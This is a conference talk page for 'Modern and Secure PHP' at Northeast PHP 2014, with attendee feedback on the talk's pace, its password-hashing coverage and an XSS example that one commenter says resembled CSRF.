Talk in English - US at Northeast PHP 2014
Track Name:
Code all the Things
Short URL: https://joind.in/talk/12433
(QR-Code (opens in new window))
Modern and Secure PHP
Comments
Comments are closed.
Covered a lot of good topics.
Great summary of the new bits of PHP. Important for a lot of people to hear
You mentioned a lot of things that I either haven't heard of I'm not using yet, but should be. It was a little fast paced, but covered a lot.
Amazing presentation! A lot of materials mentioned in this presentation provided insight to the OOP presentation by Bill Sanders and the Web Security presentation by Oscar from php architect as well. I wish there was a prize hand-out or longer Q&A.
Overall Good job Ben!
Fast-paced talk that introduced a lot of important topics and provided time for Q&A. It was a good idea to put it first since it provided a foundation for other talks. Thank you for speaking Ben.
Covered a couple of the new things people should be using but missed out on a few important pieces of information. Generally either more information could have been provided or links to relevant documentation could have been useful.
I know you're a laravel guy but perhaps making the talk agnostic would be good.
Exceptions seemed to be encouraged as a fancy go-to. The example given of throwing an exception on a password failure with an authentication system seems odd because that is normal behaviour in an authentication system.
`password_needs_rehash` is an integral part of the password hashing API and should be spoken of if you're bringing up other parts of it.
As most people who aren't using the password hashing API are likely using legacy methods for password hashing both how to migrate these and ways to secure them would be a good idea. Also an emphasis on storing the entire output of `password_hash` without touching it is usually needed.
Your example of non-persistent XSS is incorrect. The example is more like CSRF than XSS as you aren't injection any content into the DOM in the example. A better example would be injecting script tags via GET parameters.
Splitting autoloading and composer may have been a good idea. Composer isn't always a possibility for some users (no idea why) so speaking on autoloading first may be a good idea.
Lastly, While it could have just been nerves or because of the rush from the previous talk going over time - and had it been, this can be ignored - the talk seemed a little rushed and ill-prepared for.